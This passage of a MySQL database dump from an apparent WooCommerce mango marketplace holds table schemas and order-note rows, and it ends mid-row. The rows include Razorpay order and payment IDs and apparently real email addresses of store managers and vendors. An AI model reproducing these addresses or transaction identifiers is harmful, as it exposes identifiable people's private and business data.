/*!40000 ALTER TABLE `wp_bp_xprofile_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_canvas_notifications`
--

DROP TABLE IF EXISTS `wp_canvas_notifications`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_canvas_notifications` (
  `id` bigint(11) NOT NULL AUTO_INCREMENT,
  `time` bigint(11) NOT NULL DEFAULT 0,
  `post_id` bigint(11) DEFAULT NULL,
  `url` varchar(255) DEFAULT NULL,
  `title` text NOT NULL DEFAULT '',
  `msg` blob DEFAULT NULL,
  `android` varchar(1) NOT NULL,
  `ios` varchar(1) NOT NULL,
  `tags` blob DEFAULT NULL,
  `private` tinyint(1) NOT NULL DEFAULT 1,
  UNIQUE KEY `id` (`id`),
  KEY `post_id` (`post_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_canvas_notifications`
--

LOCK TABLES `wp_canvas_notifications` WRITE;
/*!40000 ALTER TABLE `wp_canvas_notifications` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_canvas_notifications` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_charitable_campaign_donations`
--

DROP TABLE IF EXISTS `wp_charitable_campaign_donations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_charitable_campaign_donations` (
  `campaign_donation_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `donation_id` bigint(20) unsigned NOT NULL,
  `donor_id` bigint(20) unsigned NOT NULL,
  `campaign_id` bigint(20) unsigned NOT NULL,
  `campaign_name` text NOT NULL,
  `amount` decimal(13,4) NOT NULL,
  PRIMARY KEY (`campaign_donation_id`),
  KEY `donation` (`donation_id`),
  KEY `campaign` (`campaign_id`),
  KEY `donor` (`donor_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_charitable_campaign_donations`
--

LOCK TABLES `wp_charitable_campaign_donations` WRITE;
/*!40000 ALTER TABLE `wp_charitable_campaign_donations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_charitable_campaign_donations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_charitable_donormeta`
--

DROP TABLE IF EXISTS `wp_charitable_donormeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_charitable_donormeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `donor_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `donor_id` (`donor_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_charitable_donormeta`
--

LOCK TABLES `wp_charitable_donormeta` WRITE;
/*!40000 ALTER TABLE `wp_charitable_donormeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_charitable_donormeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_charitable_donors`
--

DROP TABLE IF EXISTS `wp_charitable_donors`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_charitable_donors` (
  `donor_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL,
  `email` varchar(100) NOT NULL,
  `first_name` varchar(255) DEFAULT '',
  `last_name` varchar(255) DEFAULT '',
  `date_joined` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `data_erased` datetime DEFAULT '0000-00-00 00:00:00',
  `contact_consent` tinyint(1) unsigned DEFAULT NULL,
  PRIMARY KEY (`donor_id`),
  KEY `user_id` (`user_id`),
  KEY `email` (`email`),
  KEY `data_erased` (`data_erased`),
  KEY `contact_consent` (`contact_consent`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_charitable_donors`
--

LOCK TABLES `wp_charitable_donors` WRITE;
/*!40000 ALTER TABLE `wp_charitable_donors` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_charitable_donors` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_commentmeta`
--

DROP TABLE IF EXISTS `wp_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=40 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_commentmeta`
--

LOCK TABLES `wp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */;
INSERT INTO `wp_commentmeta` VALUES (3,4,'_vendor_id','4'),(4,19,'is_customer_note','1'),(5,29,'is_customer_note','1'),(6,29,'_vendor_id','20'),(7,31,'is_customer_note','1'),(8,38,'is_customer_note','1'),(9,40,'is_customer_note','1'),(10,42,'is_customer_note','1'),(11,44,'is_customer_note','1'),(12,44,'_vendor_id','20'),(13,45,'is_customer_note','1'),(14,45,'_vendor_id','20'),(15,49,'is_customer_note','1'),(16,53,'is_customer_note','1'),(17,53,'_vendor_id','20'),(18,58,'is_customer_note','1'),(19,61,'is_customer_note','1'),(20,65,'is_customer_note','1'),(21,65,'_vendor_id','25'),(22,67,'is_customer_note','1'),(23,71,'is_customer_note','1'),(24,71,'_vendor_id','25'),(25,76,'is_customer_note','1'),(26,76,'_vendor_id','21'),(27,77,'is_customer_note','1'),(28,77,'_vendor_id','25'),(29,79,'is_customer_note','1'),(30,109,'is_customer_note','1'),(31,109,'_vendor_id','28'),(32,111,'is_customer_note','1'),(33,114,'is_customer_note','1'),(34,114,'_vendor_id','25'),(35,117,'is_customer_note','1'),(36,117,'_vendor_id','25'),(37,119,'is_customer_note','1'),(38,122,'is_customer_note','1'),(39,122,'_vendor_id','21');
/*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_comments`
--

DROP TABLE IF EXISTS `wp_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT 0,
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10)),
  KEY `woo_idx_comment_type` (`comment_type`)
) ENGINE=InnoDB AUTO_INCREMENT=157 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_comments`
--

LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
INSERT INTO `wp_comments` VALUES (1,1,'A WordPress Commenter','wapuu@wordpress.example','https://wordpress.org/','','2022-01-24 07:19:21','2022-01-24 07:19:21','Hi, this is a comment.\nTo get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.\nCommenter avatars come from <a href=\"https://gravatar.com\">Gravatar</a>.',0,'1','','comment',0,0),(2,480,'A WordPress Commenter','wapuu@wordpress.example','https://wordpress.org/','','2020-07-03 08:39:13','2020-07-03 08:39:13','Hi, this is a comment.\nTo get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.\nCommenter avatars come from <a href=\\\"https://gravatar.com\\\" rel=\\\"nofollow ugc\\\">Gravatar</a>.',0,'1','','comment',0,0),(4,582,'WCMp','wcmp@www.mangomitra.in','','','2022-01-25 03:56:26','2022-01-25 03:56:26','Commission for order <a href=\"https://www.mangomitra.in/wp-admin/post.php?post=581&action=edit\">(ID : 581)</a> is created.',0,'1','WCMp','commission_note',0,0),(5,580,'WooCommerce','woocommerce@www.mangomitra.in','','','2022-01-25 03:58:35','2022-01-25 03:58:35','Razorpay OrderId: order_InporQU78JwOJY',0,'1','WooCommerce','order_note',0,0),(6,580,'WooCommerce','woocommerce@www.mangomitra.in','','','2022-01-25 04:00:35','2022-01-25 04:00:35','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(7,581,'WooCommerce','woocommerce@www.mangomitra.in','','','2022-01-25 04:00:35','2022-01-25 04:00:35','Update via parent order:  Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(8,580,'WooCommerce','woocommerce@www.mangomitra.in','','','2022-01-25 04:00:35','2022-01-25 04:00:35','Razorpay payment successful <br/>Razorpay Id: pay_Inpqsu4rEEUvsA',0,'1','WooCommerce','order_note',0,0),(9,654,'WooCommerce','woocommerce@mangomitra.in','','','2022-01-31 10:31:47','2022-01-31 10:31:47','Razorpay OrderId: order_IqJiun7n2gfFUV',0,'1','WooCommerce','order_note',0,0),(10,654,'WooCommerce','woocommerce@mangomitra.in','','','2022-01-31 10:32:36','2022-01-31 10:32:36','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(11,654,'WooCommerce','woocommerce@mangomitra.in','','','2022-01-31 10:32:37','2022-01-31 10:32:37','Razorpay payment successful <br/>Razorpay Id: pay_IqJjdvEjyK7fxo',0,'1','WooCommerce','order_note',0,0),(12,998,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-22 16:57:14','2022-02-22 11:27:14','Razorpay OrderId: order_Iz2Q40Nghtcfv0',0,'1','WooCommerce','order_note',0,0),(13,998,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-22 16:58:53','2022-02-22 11:28:53','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(14,998,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-22 16:58:55','2022-02-22 11:28:55','Razorpay payment successful <br/>Razorpay Id: pay_Iz2RgiWHkOIe4l',0,'1','WooCommerce','order_note',0,0),(15,1002,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-24 10:42:00','2022-02-24 05:12:00','Razorpay OrderId: order_Izj5vdr6K7YHkg',0,'1','WooCommerce','order_note',0,0),(16,1002,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-24 10:42:33','2022-02-24 05:12:33','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(17,1002,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-24 10:42:36','2022-02-24 05:12:36','Razorpay payment successful <br/>Razorpay Id: pay_Izj6F6Laq0MMPh',0,'1','WooCommerce','order_note',0,0),(18,1002,'sitemanager','mango@homedirect.in','','','2022-02-24 10:47:03','2022-02-24 05:17:03','Order status changed from Processing to Completed.',0,'1','WooCommerce','order_note',0,0),(19,1002,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-24 10:47:04','2022-02-24 05:17:04','Order status updated to <b>Completed</b> by <b>sitemanager</b>',0,'1','WooCommerce','order_note',0,0),(20,1005,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-24 15:37:17','2022-02-24 10:07:17','Razorpay OrderId: order_Izo7q9jlm4MCmu',0,'1','WooCommerce','order_note',0,0),(21,1005,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-24 15:37:35','2022-02-24 10:07:35','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(22,1005,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-24 15:37:38','2022-02-24 10:07:38','Razorpay payment successful <br/>Razorpay Id: pay_Izo835IspjaoPi',0,'1','WooCommerce','order_note',0,0),(23,1008,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 09:33:43','2022-02-25 04:03:43','Razorpay OrderId: order_J06SuQWopdqQc8',0,'1','WooCommerce','order_note',0,0),(24,1008,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 09:33:57','2022-02-25 04:03:57','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(25,1008,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 09:34:02','2022-02-25 04:04:02','Razorpay payment successful <br/>Razorpay Id: pay_J06T3yGYa8V5EG',0,'1','WooCommerce','order_note',0,0),(26,1012,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 11:07:49','2022-02-25 05:37:49','Razorpay OrderId: order_J084JZRZyXWrAl',0,'1','WooCommerce','order_note',0,0),(27,1012,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 11:08:02','2022-02-25 05:38:02','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(28,1012,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 11:08:07','2022-02-25 05:38:07','Razorpay payment successful <br/>Razorpay Id: pay_J084RepJ7qDkWk',0,'1','WooCommerce','order_note',0,0),(29,1012,'Testingstore','Pavitra@utfindia.in','','','2022-02-25 11:29:00','2022-02-25 05:59:00','Order item <b><a target=\"_blank\" class=\"wcfm_dashboard_item_title\" href=\"https://mangomitra.in/product/test-mango/\">test mango</a></b> status updated to <b>Completed</b> by <b><a class=\"wcfm_dashboard_item_title\" target=\"_blank\" href=\"https://mangomitra.in/store/testingstore/\">Testingstore</a></b>',0,'1','WooCommerce','order_note',0,20),(30,1012,'sitemanager','mango@homedirect.in','','','2022-02-25 11:31:09','2022-02-25 06:01:09','Order status changed from Processing to Completed.',0,'1','WooCommerce','order_note',0,0),(31,1012,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 11:31:11','2022-02-25 06:01:11','Order status updated to <b>Completed</b> by <b>sitemanager</b>',0,'1','WooCommerce','order_note',0,0),(32,654,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 11:41:25','2022-02-25 06:11:25','Order Status updated by Wc Cancel Order. Order status changed from Processing to Cancel Request.',0,'1','WooCommerce','order_note',0,0),(33,1008,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 12:03:04','2022-02-25 06:33:04','Order Status updated by Wc Cancel Order. Order status changed from Processing to Cancel Request.',0,'1','WooCommerce','order_note',0,0),(34,1013,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 12:04:26','2022-02-25 06:34:26','Razorpay OrderId: order_J0927pk7qT7nl4',0,'1','WooCommerce','order_note',0,0),(35,1013,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 12:04:38','2022-02-25 06:34:38','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(36,1013,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 12:04:41','2022-02-25 06:34:41','Razorpay payment successful <br/>Razorpay Id: pay_J092EJa6DZLNo7',0,'1','WooCommerce','order_note',0,0),(37,1013,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 12:05:00','2022-02-25 06:35:00','Order Status updated by Wc Cancel Order. Order status changed from Processing to Cancel Request.',0,'1','WooCommerce','order_note',0,0),(38,1013,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 12:07:55','2022-02-25 06:37:55','Order status updated to <b>Cancel Request</b> by <b>sitemanager</b>',0,'1','WooCommerce','order_note',0,0),(39,1013,'sitemanager','mango@homedirect.in','','','2022-02-25 12:10:08','2022-02-25 06:40:08','Order status changed from Cancel Request to Completed.',0,'1','WooCommerce','order_note',0,0),(40,1013,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 12:10:09','2022-02-25 06:40:09','Order status updated to <b>Completed</b> by <b>sitemanager</b>',0,'1','WooCommerce','order_note',0,0),(41,1013,'sitemanager','mango@homedirect.in','','','2022-02-25 12:13:03','2022-02-25 06:43:03','Order status changed from Completed to Cancelled.',0,'1','WooCommerce','order_note',0,0),(42,1013,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 12:13:04','2022-02-25 06:43:04','Order status updated to <b>Cancelled</b> by <b>sitemanager</b>',0,'1','WooCommerce','order_note',0,0),(43,1016,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 16:39:04','2022-02-25 11:09:04','Razorpay OrderId: order_J0DiDh49A1wpnq',0,'1','WooCommerce','order_note',0,0),(44,1016,'Testingstore','Pavitra@utfindia.in','','','2022-02-25 16:42:15','2022-02-25 11:12:15','Order item <b><a target=\"_blank\" class=\"wcfm_dashboard_item_title\" href=\"https://mangomitra.in/product/test-mango-2/\">test mango 2</a></b> status updated to <b>Completed</b> by <b><a class=\"wcfm_dashboard_item_title\" target=\"_blank\" href=\"https://mangomitra.in/store/testingstore/\">Testingstore</a></b>',0,'1','WooCommerce','order_note',0,20),(45,1016,'Testingstore','Pavitra@utfindia.in','','','2022-02-25 16:42:18','2022-02-25 11:12:18','Order item <b><a target=\"_blank\" class=\"wcfm_dashboard_item_title\" href=\"https://mangomitra.in/product/test-mango/\">test mango</a></b> status updated to <b>Completed</b> by <b><a class=\"wcfm_dashboard_item_title\" target=\"_blank\" href=\"https://mangomitra.in/store/testingstore/\">Testingstore</a></b>',0,'1','WooCommerce','order_note',0,20),(46,1016,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 16:47:25','2022-02-25 11:17:25','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(47,1016,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 16:47:29','2022-02-25 11:17:29','Razorpay payment successful <br/>Razorpay Id: pay_J0DqvHNn5UsmYY',0,'1','WooCommerce','order_note',0,0),(48,1016,'sitemanager','mango@homedirect.in','','','2022-02-25 16:51:26','2022-02-25 11:21:26','Order status changed from Processing to Completed.',0,'1','WooCommerce','order_note',0,0),(49,1016,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 16:51:28','2022-02-25 11:21:28','Order status updated to <b>Completed</b> by <b>sitemanager</b>',0,'1','WooCommerce','order_note',0,0),(50,1017,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 16:54:51','2022-02-25 11:24:51','Razorpay OrderId: order_J0DyteBShXk60z',0,'1','WooCommerce','order_note',0,0),(51,1017,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 16:55:07','2022-02-25 11:25:07','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(52,1017,'WooCommerce','woocommerce@mangomitra.in','','','2022-02-25 16:55:11','2022-02-25 11:25:11','Razorpay payment successful <br/>Razorpay Id: pay_J0Dz3Bh0dZOdi3',0,'1','WooCommerce','order_note',0,0),(53,1017,'Testingstore','Pavitra@utfindia.in','','','2022-02-25 16:55:18','2022-02-25 11:25:18','Order item <b><a target=\"_blank\" class=\"wcfm_dashboard_item_title\" href=\"https://mangomitra.in/product/test-mango/\">test mango</a></b> status updated to <b>Completed</b> by <b><a class=\"wcfm_dashboard_item_title\" target=\"_blank\" href=\"https://mangomitra.in/store/testingstore/\">Testingstore</a></b>',0,'1','WooCommerce','order_note',0,20),(54,1018,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-03 10:34:05','2022-03-03 05:04:05','Razorpay OrderId: order_J2UhOGXsQR3Eky',0,'1','WooCommerce','order_note',0,0),(55,1018,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-03 10:34:19','2022-03-03 05:04:19','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(56,1018,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-03 10:34:22','2022-03-03 05:04:22','Razorpay payment successful <br/>Razorpay Id: pay_J2UhWbr4iGkiE2',0,'1','WooCommerce','order_note',0,0),(57,1018,'sitemanager','mango@homedirect.in','','','2022-03-03 10:35:23','2022-03-03 05:05:23','Order status changed from Processing to Completed.',0,'1','WooCommerce','order_note',0,0),(58,1018,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-03 10:35:24','2022-03-03 05:05:24','<b>#<a target=\"_blank\" class=\"wcfm_dashboard_item_title\" href=\"https://mangomitra.in/store-manager/orders-details/1018\">1018</a></b> order status updated to <b>Completed</b> by <b>sitemanager</b>',0,'1','WooCommerce','order_note',0,0),(59,1017,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-03 10:35:41','2022-03-03 05:05:41','Order Status updated by Wc Cancel Order. Order status changed from Processing to Cancel Request.',0,'1','WooCommerce','order_note',0,0),(60,1017,'sitemanager','mango@homedirect.in','','','2022-03-03 10:36:48','2022-03-03 05:06:48','Order status changed from Cancel Request to Cancelled.',0,'1','WooCommerce','order_note',0,0),(61,1017,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-03 10:36:52','2022-03-03 05:06:52','Order status updated to <b>Cancelled</b> by <b>sitemanager</b>',0,'1','WooCommerce','order_note',0,0),(62,1022,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-03 10:56:25','2022-03-03 05:26:25','Razorpay OrderId: order_J2V4z4icXLgG5E',0,'1','WooCommerce','order_note',0,0),(63,1022,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-03 10:56:46','2022-03-03 05:26:46','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(64,1022,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-03 10:56:50','2022-03-03 05:26:50','Razorpay payment successful <br/>Razorpay Id: pay_J2V5FGTcUOL5NJ',0,'1','WooCommerce','order_note',0,0),(65,1022,'xyz','xyzabc9980@gmail.com','','','2022-03-03 10:58:36','2022-03-03 05:28:36','Order item <b><a target=\"_blank\" class=\"wcfm_dashboard_item_title\" href=\"https://mangomitra.in/product/mangggoo/\">mangggoo</a></b> status updated to <b>Completed</b> by <b><a class=\"wcfm_dashboard_item_title\" target=\"_blank\" href=\"https://mangomitra.in/store/xyz/\">xyz</a></b>',0,'1','WooCommerce','order_note',0,25),(66,1022,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-03 10:58:39','2022-03-03 05:28:39','Order status changed from Processing to Completed.',0,'1','WooCommerce','order_note',0,0),(67,1022,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-03 10:58:39','2022-03-03 05:28:39','<b>#1022</b> order status updated to <b>Completed</b>',0,'1','WooCommerce','order_note',0,0),(68,1023,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-03 11:02:39','2022-03-03 05:32:39','Razorpay OrderId: order_J2VBZGkGXUlX3x',0,'1','WooCommerce','order_note',0,0),(69,1023,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-03 11:02:52','2022-03-03 05:32:52','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(70,1023,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-03 11:02:57','2022-03-03 05:32:57','Razorpay payment successful <br/>Razorpay Id: pay_J2VBfYnIzBcRqk',0,'1','WooCommerce','order_note',0,0),(71,1023,'xyz','xyzabc9980@gmail.com','','','2022-03-03 11:04:52','2022-03-03 05:34:52','Order item <b><a target=\"_blank\" class=\"wcfm_dashboard_item_title\" href=\"https://mangomitra.in/product/mangggoo/\">mangggoo</a></b> status updated to <b>Completed</b> by <b><a class=\"wcfm_dashboard_item_title\" target=\"_blank\" href=\"https://mangomitra.in/store/xyz/\">xyz</a></b>',0,'1','WooCommerce','order_note',0,25),(72,1023,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-03 11:07:48','2022-03-03 05:37:48','Order Status updated by Wc Cancel Order. Order status changed from Processing to Cancel Request.',0,'1','WooCommerce','order_note',0,0),(73,1195,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 11:54:10','2022-03-07 06:24:10','Razorpay OrderId: order_J46CRqW1n1qGLc',0,'1','WooCommerce','order_note',0,0),(74,1195,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 11:54:23','2022-03-07 06:24:23','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(75,1195,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 11:54:27','2022-03-07 06:24:27','Razorpay payment successful <br/>Razorpay Id: pay_J46CYsdmqkUvx3',0,'1','WooCommerce','order_note',0,0),(76,1195,'MainStore','bhavani@utfindia.in','','','2022-03-07 11:57:10','2022-03-07 06:27:10','Order item <b><a target=\"_blank\" class=\"wcfm_dashboard_item_title\" href=\"https://mangomitra.in/product/mango-solapur-pickle/\">Mango Solapur Pickle</a></b> status updated to <b>Completed</b> by <b><a class=\"wcfm_dashboard_item_title\" target=\"_blank\" href=\"https://mangomitra.in/store/mainstore/\">MainStore</a></b>',0,'1','WooCommerce','order_note',0,21),(77,1195,'xyz','xyzabc9980@gmail.com','','','2022-03-07 12:00:16','2022-03-07 06:30:16','Order item <b><a target=\"_blank\" class=\"wcfm_dashboard_item_title\" href=\"https://mangomitra.in/product/testmango/\">testmango</a></b> status updated to <b>Completed</b> by <b><a class=\"wcfm_dashboard_item_title\" target=\"_blank\" href=\"https://mangomitra.in/store/xyz/\">xyz</a></b>',0,'1','WooCommerce','order_note',0,25),(78,1195,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 12:00:19','2022-03-07 06:30:19','Order status changed from Processing to Completed.',0,'1','WooCommerce','order_note',0,0),(79,1195,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 12:00:19','2022-03-07 06:30:19','<b>#1195</b> order status updated to <b>Completed</b>',0,'1','WooCommerce','order_note',0,0),(80,1196,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 12:36:48','2022-03-07 07:06:48','Razorpay OrderId: order_J46vU8FkaJZgbx',0,'1','WooCommerce','order_note',0,0),(81,1196,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 12:37:12','2022-03-07 07:07:12','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(82,1196,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 12:37:17','2022-03-07 07:07:17','Razorpay payment successful <br/>Razorpay Id: pay_J46vmzc8quKMY3',0,'1','WooCommerce','order_note',0,0),(83,1197,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 12:48:17','2022-03-07 07:18:17','Razorpay OrderId: order_J477bozFYRFvNT',0,'1','WooCommerce','order_note',0,0),(84,1197,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 12:48:35','2022-03-07 07:18:35','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(85,1197,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 12:48:40','2022-03-07 07:18:40','Razorpay payment successful <br/>Razorpay Id: pay_J477pMZB7ByNwL',0,'1','WooCommerce','order_note',0,0),(86,1198,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 12:50:40','2022-03-07 07:20:40','Razorpay OrderId: order_J47A8IHCzYT3Hi',0,'1','WooCommerce','order_note',0,0),(87,1198,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 12:50:56','2022-03-07 07:20:56','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(88,1198,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 12:50:59','2022-03-07 07:20:59','Razorpay payment successful <br/>Razorpay Id: pay_J47AIFiWisWXWl',0,'1','WooCommerce','order_note',0,0),(89,1199,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 12:53:07','2022-03-07 07:23:07','Razorpay OrderId: order_J47CiLLUasELRA',0,'1','WooCommerce','order_note',0,0),(90,1199,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 12:53:18','2022-03-07 07:23:18','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(91,1199,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 12:53:23','2022-03-07 07:23:23','Razorpay payment successful <br/>Razorpay Id: pay_J47CoPwV40zzLJ',0,'1','WooCommerce','order_note',0,0),(92,1200,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 13:04:47','2022-03-07 07:34:47','Item testmango (#1194) was Pre-Ordered',0,'1','WooCommerce','order_note',0,0),(93,1200,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 13:04:50','2022-03-07 